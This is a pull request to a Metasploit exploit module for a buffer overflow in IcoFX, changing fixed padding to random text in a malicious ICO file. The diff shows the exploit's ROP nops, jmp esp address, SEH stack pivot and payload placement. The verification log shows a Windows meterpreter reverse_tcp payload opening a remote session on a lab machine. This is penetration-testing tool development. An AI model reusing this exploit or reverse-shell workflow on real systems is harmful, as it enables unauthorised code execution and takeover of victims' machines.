### PR TITLE
Make things random on icofx_bof

### DIFF
--- a/modules/exploits/windows/fileformat/icofx_bof.rb
+++ b/modules/exploits/windows/fileformat/icofx_bof.rb
@@ -72,13 +72,13 @@ class Metasploit3 < Msf::Exploit::Remote
     # ICONDIRENTRY structures 102 structures are using to overwrite
     # every structure = 16 bytes
     # 100 structures are used to reach the local variables
-    ico << "A" * 652
+    ico << rand_text(652)
     ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods
     ico << [0x0045cc21].pack("V")      # jmp esp
     ico << payload.encoded
-    ico << "B" * (
+    ico << rand_text(
       1600 -                 # 1600 = 16 ICONDIRENTRY struct size * 100
-      652 -                  # padding
+      652 -                  # padding to align the stack pivot
       80 -                   # rop nops size
       4 -                    # jmp esp pointer size
       payload.encoded.length
@@ -86,11 +86,11 @@ class Metasploit3 < Msf::Exploit::Remote
     # The next ICONDIRENTRY allows to overwrite the interesting local variables
     # on the stack
     ico << [2].pack("V")          # Counter (remaining bytes) saved on the stack
-    ico << "A" * 8                # Padding
+    ico << rand_text(8)           # Padding
     ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler
     # The next ICONDIRENTRY allows to overwrite the seh handler
     ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret
-    ico << "B" * (0xc) # padding
+    ico << rand_text(0xc) # padding
     return ico
   end
 


### PR DESCRIPTION
Forgot to random things, we're not debugging anymore.
## Verification
- [x] Test the exploit like in #2816, it should be working as before.

```
msf exploit(icofx_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(icofx_bof) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(icofx_bof) > rexploit
[*] Reloading module...

[*] Creating 'msf.ico' file...
[+] msf.ico stored at /Users/juan/.msf4/local/msf.ico
msf exploit(icofx_bof) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.133
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:50128) at 2013-12-31 16:06:11 -0600

meterpreter > getuid
eServer username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > exit -y
```
